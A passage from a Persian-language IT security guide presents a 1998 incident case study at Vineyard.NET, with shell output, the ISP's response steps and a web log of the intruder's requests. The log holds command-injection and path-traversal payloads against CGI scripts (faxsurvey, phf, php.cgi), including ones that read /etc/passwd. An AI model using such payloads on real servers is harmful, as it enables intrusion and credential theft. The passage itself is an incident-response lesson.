‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﻧﺪ ﻛﻪ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻣﻬﺎﺟﻢ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻧﻴﺎﻳﻨﺪ؛ ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ‪ rootkit‬ﻣﻤﻜﻦ ﺍﺳﺖ ﭘﻨﺞ‬
‫ﺩﻗﻴﻘﻪ ﺍﻧﺘﻬﺎﻳﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺍﺯ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﺣﺬﻑ ﻛﻨﺪ‪.‬‬
‫‪٤٣‬‬
‫ﻛﺮﻣﻬﺎ‬
‫ﻛﺮﻣﻬﺎ ﻛﻪ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ ﻳﺎ ﺍﺟﺰﺍﻱ ﺷﺒﻜﻪﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺗﺒﺪﻳﻞ ﺑﻪ ﺭﻭﺵ ﺭﺍﻳﺠﻲ‬
‫ﺑﺮﺍﻱ ﺧﺪﺷﻪ ﺩﺍﺭ ﻛﺮﺩﻥ ﺁﻧﻲ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺷﺪﻩﺍﻧﺪ‪.‬‬

‫ﻣﻄﺎﻟﻌﻪ ﻣﻮﺭﺩﻱ‪Faxsurvey :‬‬


‫ﺩﺭ ﻫﻔﺘﻢ ﺍﻛﺘﺒﺮ ‪ ،۱۹۹۸‬ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺩﺭ ‪ Vineyard.NET‬ﻣﺘﻮﺟﻪ ﺷﺪ ﻛﻪ ﻛﺎﺭﺑﺮ ‪ http‬ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﻭﺏ ﺷـﺮﻛﺖ ﻭﺍﺭﺩ ﺷـﺪﻩ‬
‫ﺍﺳﺖ‪:‬‬

‫‪Script started on Wed Oct 7 20:54:21 1998‬‬


‫‪Bash-2.02# W‬‬
‫‪8:57PM up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35‬‬
‫‪USER TTY FROM‬‬ ‫‪LOGIN@ IDLE WHAT‬‬

‫‪43‬‬ ‫‪Worms‬‬
‫‪٢٧١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫‪http p0 KRLDB110-06.spli Tue02AM 1days /bin/sh‬‬


‫)‪simsong p1 asy12.vineyard.n 8:42PM 15 -tcsh (tcsh‬‬
‫‪ericx p2 mac-ewb.vineyard 8:46PM 0 script‬‬
‫‪ericx p3 mac-ewb.vineyard 8:46PM 11 top‬‬
‫‪ericx p4 mac-ewb.vineyard 8:53PM 1 sleep 5‬‬
‫‪bash-2.02#‬‬
‫ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪ ﺑﺎ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ BSDI‬ﻧﮕﺎﺭﺵ ‪ ۳,۱‬ﺑﺎ ﻫﻤﺔ ﻭﺻﻠﻪﻫﺎ‪ ٤٤‬ﻭ ﺍﺻﻼﺣﺎﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﻩ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺑﻮﺩ ﻛﺎﺭ ﻣﻲﻛﺮﺩ‪ .‬ﺳﺮﻭﻳﺲ‪-‬‬
‫ﺩﻫﻨﺪﺓ ﻭﺏ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Apache‬ﻣﻮﺳﻮﻡ ﺑﻪ "‪ "Strong-hold‬ﺑﻮﺩ‪ .‬ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﺷـﺮﻭﻉ ﻋﻤﻠﻴـﺎﺕ ﺧﻮﺩﻛـﺎﺭ ﻧﻘـﻞ ﻭ‬
‫ﺍﻧﺘﻘﺎﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭﺟﻮﻩ ﻛﺎﺭﻫﺎﻱ ﺧﺎﻧﮕﻲ ﺩﺭ ﺣﺴﺎﺑﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪ‪ .‬ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﻧﻘـﻞ ﻭ ﺍﻧﺘﻘـﺎﻻﺕ ﺍﻳـﻦ ﻭﺟـﻮﻩ‪ ،‬ﺭﺍﻳﺎﻧـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﻭ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﺮﺩ‪) .‬ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻗﺎﻟﺐ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﺷﺪ‪(.‬‬
‫ﺩﺭ ﻫﻤﺔ ﻣﻮﺍﺭﺩ ﻣﺸﺎﺑﻪ‪ ،‬ﻭﺭﻭﺩ ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﻌﻨﻮﺍﻥ ‪ http‬ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﻴﺠﻪ ﺩﻭ ﭼﻴﺰ ﺑﺎﺷﺪ‪ .‬ﺍﻭﻝ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﻀﻮ ﭘﺮﺳﻨﻞ ‪ ISP‬ﺑﺎﺷﺪ‬
‫ﻛﻪ ﺍﺯ ﺣﺴﺎﺏ ‪ http‬ﺑﺮﺍﻱ ﺭﻓﻊ ﺍﺷﻜﺎﻝ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻩ‪ ،‬ﻭ ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻤﻲ ﺑﺎﺷﺪ ﻛﻪ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑـﻪ ﺣـﺴﺎﺏ‬
‫‪ http‬ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﺍﻣﺎ ﻣﻮﻓﻖ ﻧﺸﺪﻩ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪ .‬ﭼﻮﻥ ﻛﺎﺭﺑﺮ ‪ http‬ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻧـﺎﻣﺶ ﺑـﺎ ‪KRLD110-06.spli‬‬
‫ﺷﺮﻭﻉ ﻣﻲﺷﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﻛﺎﺭﻣﻨﺪ ﺍﻳﻦ ﻣﺆﺳﺴﻪ ﻓﻬﻤﻴﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻳﻚ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮ ﻣﺠﺎﺯ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻭﻗﺘﻲ ﻧﻔﻮﺫ ﻛﺸﻒ ﺷﺪ‪ ،‬ﻳﻜﻲ ﺍﺯ ﭘﺮﺳﻨﻞ ﺑﻼﻓﺎﺻﻠﻪ ﺑﺮﻧﺎﻣﻪ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺨﺼﻮﺹ ‪ Unix‬ﺭﺍ ﺍﺟﺮﺍ ﻛﺮﺩ ﺗﺎ ﺍﻗﺪﺍﻣﺎﺕ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﺛﺒـﺖ ﻛﻨـﺪ‪.‬‬
‫ﺑﻨﻈﺮ ﺭﺳﻴﺪ ﻛﻪ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺗﺎ ﻣﺪﺕ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﺭﻭﺯ ﺑﻪ ﺷﺒﻜﻪ ﻣﺘﺼﻞ ﻧﺸﺪ‪ .‬ﻧﻔﻮﺫ ﺍﻭﻟﻴﻪ ﺩﺭ ﺭﻭﺯ ﺳﻪﺷﻨﺒﻪ ﺳﺎﻋﺖ ‪ ۲‬ﺑﺎﻣﺪﺍﺩ ﺭﺥ‬
‫ﺩﺍﺩﻩ ﺑﻮﺩ‪ .‬ﮔﺎﻡ ﺑﻌﺪﻱ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻫﻤﺔ ﭘﺮﺩﺍﺯﻩﻫﺎﻳﻲ‪ ٤٥‬ﻛﻪ ﺩﺭ ﺁﻧﺰﻣﺎﻥ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺑﻮﺩﻧﺪ ﻓﻬﺮﺳﺖ ﺷﻮﻧﺪ‪ .‬ﺩﻭ ﭘﺮﺩﺍﺯﻩ ﻏﻴﺮﻋﺎﺩﻱ ﺑﻮﺩﻧﺪ‬
‫‪ -‬ﺩﻭ ﻧﺴﺨﻪ ﺍﺯ ﭘﻮﺳﺘﻪ‪ /bin/sh ٤٦‬ﻛﻪ ﺗﻮﺳﻂ ‪ http‬ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻩ ﺑﻮﺩﻧﺪ‪ .‬ﻫﺮ ﺩﻭﻱ ﺍﻳﻦ ﭘﻮﺳﺘﻪﻫﺎ ﺍﺯ ﺭﻭﺯ ﮔﺬﺷـﺘﻪ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩﻩ‬
‫ﺑﻮﺩﻧﺪ؛ ﻳﻜﻲ ﺩﺭ ﺳﺎﻋﺖ ‪ ۲‬ﺑﺎﻣﺪﺍﺩ ﻭ ﺩﻳﮕﺮﻱ ‪ ۴‬ﺑﺎﻣﺪﺍﺩ‪.‬‬
‫‪bash-2.02# ps auxww‬‬
‫‪USER PID %CPU %MEM VSZ RSS TT STATED TIME COMMAND‬‬
‫‪root‬‬ ‫)‪11766 3.0 0.0 0 0 ?? Z 23Sep98 0:00.00 (admin-server‬‬
‫‪root‬‬ ‫)‪3763 1.0 0.0 0 0 ?? Z 2:03PM 0:00.00 (junkbuster‬‬
‫‪mail‬‬ ‫‪18120 1.3 0.3 816 724 ?? S 8:56PM 0:00.46 smap‬‬
‫‪root‬‬ ‫)‪17573 1.0 0.0 0 0 ?? Z 11:03AM 0:00.00(admin-server‬‬
‫‪root‬‬ ‫‪16 0.0 0.0 68 64 ?? Is 10Sep98 0:00.00 asyncd 2‬‬
‫‪root‬‬ ‫‪18 0.0 0.0 68 64 ?? Is 10Sep98 0:00.02 asyncd 2‬‬
‫‪root‬‬ ‫‪28 0.0 8.0 748 20680 ?? Ss 10Sep98 0:16.32 mfs -o rw -s 40960 /dev/sdob/tmp‬‬
‫)‪(mount_mfs‬‬
‫‪root‬‬ ‫‪53 0.0 0.1 268 296 ?? Ss 10Sep98 0:38.23 gettyd –s‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪root‬‬ ‫)‪18670 0.0 0.5 560 1276 ?? S Tue02AM 0:04.77 (xterm‬‬


‫‪http‬‬ ‫‪18671 0.0 0.1 244 276 p0 Is Tue02AM 0:02.23 /bin/sh‬‬
‫‪http‬‬ ‫‪26225 0.0 0.1 236 276 p0 I+ Tue04AM 0:00.7 /bin/sh‬‬
‫…‬
‫ﺑﻨﻈﺮ ﻣﻲﺭﺳﻴﺪ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﻣﻮﻓﻖ ﺑﻪ ﻧﻔﻮﺫ ﺷﺪﻩ ﻭ ﺳﭙﺲ ﺑﻨﺎ ﺑﻪ ﺩﻻﻳﻠﻲ ﻛﺎﺭ ﺭﺍ ﺭﻫﺎ ﻛﺮﺩﻩ ﺍﺳﺖ‪ ISP .‬ﺑﺮﺍﻱ ﺭﻭﻳـﺎﺭﻭﻳﻲ ﺑـﺎ ﺍﻳـﻦ ﺗﻬﺪﻳـﺪ‬
‫ﺿﻮﺍﺑﻂ ﺯﻳﺮ ﺭﺍ ﺍﺑﻼﻍ ﻛﺮﺩ‪:‬‬
‫ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﺍﺯ ﺁﻧﭽﻪ ﺩﺭﺣﺎﻝ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻥ ﺍﺳﺖ ﺁﮔﺎﻩ ﻧﻜﻨﻴﺪ‪.‬‬ ‫‪.۱‬‬
‫ﺁﺩﺭﺱ ‪ IP‬ﻣﺒﺪﺃ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ‪.‬‬ ‫‪.۲‬‬
‫ﺍﺯ ﻓﺮﻣﺎﻥ ‪ kill‬ﺩﺭ ‪ Unix‬ﺑﺮﺍﻱ ﺗﻮﻗﻒ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﻣﺰﺍﺣﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﻓﺮﻣﺎﻥ ﻋﻠﻴﺮﻏﻢ ﺑﺎﻗﻲ ﮔﺬﺍﺷﺘﻦ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﭘـﺮﺩﺍﺯﻩﻫـﺎ‬ ‫‪.۳‬‬
‫ﺩﺭ ﺣﺎﻓﻈﻪ‪ ،‬ﺍﺯ ﺍﺟﺮﺍﻱ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﺪ‪.‬‬

‫‪44‬‬ ‫‪Patches‬‬
‫‪45‬‬ ‫‪Process‬‬
‫‪46‬‬ ‫‪Shell‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ٢٧٢

.‫ ﻳﻚ ﻧﺴﺨﺔ ﺛﺎﻧﻮﻳﻪ ﺍﺯ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‬Unix ‫ ﺩﺭ‬gcore ‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ‬ .۴
.‫ ﻧﻔﻮﺫﮔﺮ ﺗﻌﺮﻳﻒ ﻧﻤﺎﻳﻴﺪ‬ISP ‫ ﺑﺮﺍﻱ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﺑﺴﺘﻪﻫﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﻣﺒﺪﺃ‬ISP ‫ﻳﻚ ﺿﺎﺑﻄﻪ ﺩﺭ ﻣﺴﻴﺮﻳﺎﺏ‬ .۵
‫ ﻛﺎﻣ ﹰ‬kill -9 ‫ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺭﺍ ﺑﺎ ﻓﺮﻣﺎﻥ‬
.‫ﻼ ﺍﺯ ﺑﻴﻦ ﺑﺒﺮﻳﺪ‬ .۶
.‫ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻧﻔﻮﺫﮔﺮ ﭼﮕﻮﻧﻪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﻭ ﺣﻔﺮﺓ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺭﺍ ﺍﺻﻼﺡ ﻛﻨﻴﺪ‬ .۷
.‫ﻣﺠﺮﻳﺎﻥ ﻗﻀﺎﻳﻲ ﺭﺍ ﻣﻄﻠﻊ ﺳﺎﺯﻳﺪ‬ .۸
‫ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺟﺪﻳـﺪﻱ ﺑﺪﺳـﺖ‬.‫ ﺍﻳﻦ ﻛﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‬netstat ‫ ﺳﻌﻲ ﻛﺮﺩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ‬ISP ،‫ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﻧﻔﻮﺫﮔﺮ‬
‫( ﺑـﻪ‬Apache.Vineyard.NET) ‫ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ‬X11 ‫ ﺑﻠﻜﻪ ﻳﻚ ﺍﺗﺼﺎﻝ‬،‫ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﺸﺪﻩ ﺑﻮﺩ‬SSH ‫ ﻳﺎ‬telnet ‫ ﻧﻔﻮﺫﮔﺮ ﺑﺎ‬.‫ﺁﻣﺪ‬
.‫ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻣﻬﺎﺟﻢ ﺍﺟﺮﺍ ﻣﻲﺷﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺖ‬X ‫ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ‬

bash-2.02# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1137 SYN_RCVD
tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1136 SYN_RCVD
tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1135 SYN_RCVD
tcp 0 0 VINEYARD.NET.http DSY27.VINEYARD.N.1079 SYN_RCVD
tcp 0 2456 VINEYARD.NET.http nhv-ct4-09.ix.ne.1134 ESTABLISHED
tcp 0 2268 VINEYARD.NET.http DSY27.VINEYARD.N.1078 ESTABLISHED
tcp 0 2522 VINEYARD.NET.http 209.174.140.26.1205 ESTABLISHED
tcp 0 8192 VINEYARD.NET.http host-209-214-118.1785 ESTABLISHED
tcp 0 4916 VINEYARD.NET.http host-209-214-118.1784 ESTABLISHED
tcp 0 0 VINEYARD.NET.http host-209-214-118.1783 ESTABLISHED
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1163 FIN_WAIT_2
tcp 0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1135 ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.1135 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp 0 0 VINEYARD.NET.smtp 208.135.218.34.1479 ESTABLISHED
tcp 0 3157 VINEYARD.NET.pop ASY5.VINEYARD.NE.1027 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2050 ESTABLISHED
tcp 0 0 VINEYARD.NET.http host-209-214-118.1782 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http host-209-214-118.1781 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http host-209-214-118.1775 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http 56k-2234.hey.net.1099 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.https ESY8.VINEYARD.NE.1557 FIN_WAIT_2
tcp 0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1058 ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.1058 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp 0 0 APACHE.VINEYARD..smtp m28.boston.juno..54519 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.nfs ESTABLISHED
tcp 0 328 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2048 ESTABLISHED
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1162 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1160 FIN_WAIT_2
tcp 0 0 NEXT.VINEYARD.NE.ssh ASY12.VINEYARD.N.1047 ESTABLISHED
tcp 0 7300 VINEYARD.NET.pop DSY27.VINEYARD.N.1061 ESTABLISHED
tcp 0 0 NEXT.VINEYARD.NE.imap2 ASY12.VINEYARD.N.1041 ESTABLISHED
tcp 0 0 VINEYARD.NET.3290 VINEYARD.NET.imap2 CLOSE_WAIT
tcp 0 0 VINEYARD.NET.ssh simsong.ne.media.1017 ESTABLISHED
tcp 0 0 APACHE.VINEYARD..3098 KRLDB110-06.spli.X11 ESTABLISHED
tcp 8760 0 VINEYARD.NET.1022 BACKUP.VINEYARD..ssh ESTABLISHED
tcp 0 0 LOCALHOST.VINEYA.4778 *.* LISTEN
tcp 0 0 LOCALHOST.VINEYA.domai *.* LISTEN
tcp 0 0 NET10.VINEYARD.N.domai *.* LISTEN
tcp 0 0 SMTP4.VINEYARD.N.domai *.* LISTEN
٢٧٣ ‫ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬:‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ ﺑﻪ ﺩﺳـﺘﮕﺎﻩ ﺭﺍﻩ ﺩﻭﺭ‬xterm ‫ ﺑﺮﺍﻱ ﺗﺨﻢﺭﻳﺰﻱ ﻳﻚ‬CGI ‫ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪ ﻛﻪ ﻣﻬﺎﺟﻢ ﺍﺯ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ‬ISP
:‫ ﺍﻧﺠﺎﻡ ﺷﺪ‬ISP ‫ ﻳﻚ ﺟﺴﺘﺠﻮﻱ ﺳﺮﻳﻊ ﺩﺭ ﻣﻴﺎﻥ ﺛﺒﺘﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ‬،‫ ﺑﺮﺍﻱ ﺁﺯﻣﻮﻥ ﺍﻳﻦ ﻓﺮﺿﻴﻪ‬.‫ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﺳﺖ‬

% grep -I krldb110-06 /vni/apache/log/access_log


1. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] “GET /cgi-bin/
phf?Qname=me%0als%20-lFa
HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
2. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] “GET /cgi-bin/ faxsurvey?ls%20-
lFa HTTP/1.0”
200 5469 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
3. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] “GET /cgi-bin/
viewsource?../../../../../../../../
etc/passwd HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows
98)” “/htdocs/biz/captiva”
4. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:53 -0400] “GET /cgi-bin/
htmlscript?../../../../../../../../etc/passwd HTTP/1.0” 404 - “-” “Mozilla/ 4.0 (compatible; MSIE
4.01;Windows 98)” “/htdocs/biz/captiva”
5. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:54 -0400] “GET /cgi-bin/
campas?%0als%20-lFa
HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)”
“/htdocs/biz/captiva”
6. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:55 -0400] “GET /cgi-bin/
handler/useless_shit;ls%20-
lFa|?data=Download HTTP/1.0” 404 - “-” “Mozilla/ 4.0 (compatible; MSIE 4.01; Windows
98)” “/htdocs/biz/captiva”
7. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:56 -0400] “GET /cgi-bin/
php.cgi?/etc/passwd
HTTP/1.0” 404 - “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)”
“/htdocs/biz/captiva”
8. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] “GET /cgi-bin/ faxsurvey?ls%20-
lFa HTTP/1.1”
200 5516 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
9. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] “GET /cgi-bin/
faxsurvey?uname%20-a
HTTP/1.1” 200 461 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)”
“/htdocs/biz/captiva”
10. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:03 -0400] “GET /cgi-bin/ faxsurvey?id
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

HTTP/1.1” 200
381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/biz/captiva”
11. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] “GET /cgi-bin/
faxsurvey?cat%20/etc/passwd
HTTP/1.1” 200 79467 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)”
“/htdocs/biz/captiva”
12. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] “GET /cgi-bin/ faxsurvey?ls%20-
lFa%20/usr/
HTTP/1.1” 200 1701 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)”
“/htdocs/biz/captiva”
13. krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] “GET /cgi-bin/ faxsurvey?id
HTTP/1.1” 200
381 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
14. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] “GET /cgi-bin/ faxsurvey?pwd
HTTP/1.1” 200
305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net”
15. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] “GET /cgi-bin/
faxsurvey?/bin/pwd HTTP/1.1”
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٧٤‬‬

‫”‪200 305 “-” “Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)” “/htdocs/web.vineyard.net‬‬
‫‪16. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] “GET /cgi-bin/ faxsurvey?ls%20-‬‬
‫”‪lFa HTTP/1.1‬‬
‫”‪200 5516 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)” “/htdocs/web.vineyard.net‬‬
‫‪17. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] “GET /cgi-bin/ faxsurvey?ls%20-‬‬
‫”)‪lFa%20../conf/ HTTP/1.1” 200 305 “-” “Mozilla/4.0 (compatible; MSIE 4.01; Windows 98‬‬
‫”‪“/htdocs/web.vineyard.net‬‬
‫ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺳﻄﺮﻫﺎﻱ ‪ ۱‬ﺗﺎ ‪ ۷‬ﺑﺎ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺍﺧﺘﻼﻑ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺭﺥ ﺩﺍﺩﻩﺍﻧـﺪ‪ .‬ﺑﻨﻈـﺮ ﻣـﻲﺭﺳـﺪ ﻣﻬـﺎﺟﻢ ﺍﺯ ﻳـﻚ ﺍﺑـﺰﺍﺭ ﺍﺗﻮﻣﺎﺗﻴـﻚ ﻛـﻪ‬
